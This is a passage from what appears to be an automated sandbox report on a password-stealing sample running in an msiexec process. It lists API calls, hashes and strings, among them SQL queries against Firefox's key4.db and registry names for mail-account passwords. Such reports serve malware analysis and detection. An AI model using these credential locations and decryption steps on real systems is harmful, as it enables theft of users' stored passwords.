                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                    Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CloseFind
                                                                    • String ID:
                                                                    • API String ID: 1863332320-0
                                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                    Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                    Non-executed Functions

                                                                    Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                    • API String ID: 2238633743-192783356
                                                                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                    Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                    • API String ID: 3963849919-1658304561
                                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                    Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memcpymemset
                                                                    • String ID: (yE$(yE$(yE
                                                                    • API String ID: 1865533344-362086290
                                                                    • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                    • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                    Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040EBD8
                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                    • memset.MSVCRT ref: 0040EC2B
                                                                    • memset.MSVCRT ref: 0040EC47
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                    • memset.MSVCRT ref: 0040ECDD
                                                                    • memset.MSVCRT ref: 0040ECF2
                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                    • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                    • memset.MSVCRT ref: 0040EDE1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                    • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                    • API String ID: 3137614212-1455797042
                                                                    • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                    • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                    • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                    • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                    Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                    • memset.MSVCRT ref: 0040E736
                                                                    • memset.MSVCRT ref: 0040E74F
                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                    • memset.MSVCRT ref: 0040E858
                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                    • API String ID: 4171719235-3943159138
                                                                    • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                    • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                    Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                    • GetDC.USER32 ref: 004104E2
                                                                    • strlen.MSVCRT ref: 00410522
                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                    • sprintf.MSVCRT ref: 00410640
                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                    • String ID: %s:$EDIT$STATIC
                                                                    • API String ID: 1703216249-3046471546
                                                                    • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                    • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                    Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004024F5
                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,67CE7B60,?,00000000), ref: 00402533
                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$QueryValuememset
                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                    • API String ID: 168965057-606283353
                                                                    • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                    • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                    Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00402869
                                                                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                    • _mbscpy.MSVCRT(?,?,67CE7B60,?,00000000), ref: 004028A3
                                                                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,67CE7B60,?,00000000), ref: 0040297B
                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                    • API String ID: 1497257669-167382505
                                                                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                    Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                    • memset.MSVCRT ref: 0040128E
                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                    • String ID:
                                                                    • API String ID: 2998058495-0
                                                                    • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                    • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                    Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                    • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                    • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                    • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                    • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                    • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$memcpy
                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                    • API String ID: 231171946-2189169393
                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                    Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                    • API String ID: 633282248-1996832678
                                                                    • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                    • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                    Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00406782
                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                    • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                    • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                    • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                    • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                    • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                    Strings
                                                                    • key4.db, xrefs: 00406756
                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                    • , xrefs: 00406834
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                    • API String ID: 3614188050-3983245814
                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                    Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A973
                                                                    • memset.MSVCRT ref: 0040A996
                                                                    • memset.MSVCRT ref: 0040A9AC
